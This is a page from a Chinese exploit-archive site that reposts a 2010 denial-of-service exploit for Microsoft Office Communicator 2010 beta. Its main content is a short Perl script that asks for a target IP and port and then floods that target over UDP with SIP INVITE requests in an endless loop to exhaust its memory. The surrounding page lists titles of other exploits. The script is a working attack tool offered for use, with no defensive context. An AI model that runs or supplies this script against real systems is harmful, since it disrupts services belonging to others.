首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Office ( 2010 beta ) Communicator SIP DoS Exploit
来源:www.iqs3cur1ty.com/vb 作者:indoushka 发布时间:2010-04-07  
===========================================================
Microsoft Office ( 2010 beta ) Communicator SIP DoS Exploit
===========================================================

========================================================================================                
| # Title    : Microsoft Office ( 2010 beta ) Communicator SIP denial of service Exploit     
| # Author   : indoushka                                                             
| # email    : indoushka@hotmail.com                                                 
| # Home     : www.iqs3cur1ty.com/vb                                                                                                                                                                                       
| # Tested on: windows SP2      
| # Bug      : Denial of service Exploit                                                                    
======================      Exploit By indoushka       =================================
# Exploit  :
 
#!usr/bin/perl
#######################################################################################################################
#    Microsoft Office 2010 Communicator allows remote attack to cause a denial of service (memory consumption) via    #
#    a large number of SIP INVITE requests.                                                                           #
#######################################################################################################################
  
  
use IO::Socket;
  
print("\nEnter IP Address of Target Server: \n");
$vuln_host_ip = <STDIN>;
print("\nEnter IP Address of Target Server: \n");
$port = <STDIN>;
  
$sock_sip = IO::Socket::INET->new(    PeerAddr => $vuln_host_ip,
                                     PeerPort => $port,
                                     Proto    => 'udp') || "Unable to create Socket";
#if the server is configured on TCP replace 'udp' with 'tcp'.
  
while(1)
{
print $sock_sip "INVITE sip:arpman.malicious.com SIP/2.0\r\nVia: SIP/2.0/UDP 172.16.16.4;branch=123-4567-900\r\n";
   
}
  
#program never comes here for execution

close($sock_sip);

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Foxit Reader <= 3.2.1.0401 Den
·Portable AVS DVD Authoring v1.
·Jzip v1.3 (.zip) Unicode buffe
·MP3 Wav Editor v3.80 .mp3 Loca
·Virata EmWeb R6.0.1 Remote Cra
·MyVideoConverter v2.15 Local D
·Juke 4.0.2 DoS Multiple Files
·ilchClan <= 1.0.5 (cid) SQL In
·Portable AVS DVD Authoring v1.
·Internet Explorer Tabular Data
·MP3 Wav Editor v3.80 .mp3 Loca
·Local Privilege Escalation in
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved